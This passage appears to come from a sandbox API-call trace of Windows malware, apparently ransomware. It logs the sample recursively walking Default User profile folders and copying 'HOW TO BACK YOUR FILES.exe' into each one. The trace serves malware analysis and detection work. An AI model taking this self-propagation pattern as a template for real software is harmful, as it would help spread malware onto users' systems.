Data\\Microsoft\\Windows Media\\12.0" [0078.717] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.717] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.718] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.718] GetLastError () returned 0x0 [0078.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.718] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.718] CloseHandle (hObject=0xa4) returned 1 [0078.718] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.718] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.718] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.718] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.718] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0078.719] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0078.719] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.719] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.719] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.719] GetLastError () returned 0x0 [0078.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.719] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.719] CloseHandle (hObject=0xa4) returned 1 [0078.720] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.720] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.720] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.720] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.720] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0078.720] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0078.720] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.720] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.721] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.721] GetLastError () returned 0x0 [0078.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.721] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.721] CloseHandle (hObject=0xa4) returned 1 [0078.721] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.721] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x578246e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x578246e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.721] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.721] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.721] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0078.722] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0078.722] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.722] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.722] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.722] GetLastError () returned 0x0 [0078.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.722] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.722] CloseHandle (hObject=0xa4) returned 1 [0078.723] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.723] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.723] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.723] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.723] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0078.723] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0078.723] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.723] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.724] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.724] GetLastError () returned 0x0 [0078.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.724] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.724] CloseHandle (hObject=0xa4) returned 1 [0078.724] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.724] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5840b4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5840b4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.724] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.724] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.724] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" [0078.725] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" [0078.725] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.725] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.725] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.725] GetLastError () returned 0x0 [0078.725] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.725] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.726] CloseHandle (hObject=0xa4) returned 1 [0078.726] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.726] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.726] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.726] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.726] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.726] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.726] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.726] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.727] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.727] GetLastError () returned 0x0 [0078.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.727] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.727] CloseHandle (hObject=0xa4) returned 1 [0078.727] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.727] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.728] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.728] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.728] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.728] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.728] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.728] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.729] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.729] GetLastError () returned 0x0 [0078.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.729] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.729] CloseHandle (hObject=0xa4) returned 1 [0078.729] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.729] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.729] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.729] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.729] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.729] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.730] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.730] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.730] GetLastError () returned 0x0 [0078.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.730] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.730] CloseHandle (hObject=0xa4) returned 1 [0078.731] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.731] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.731] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 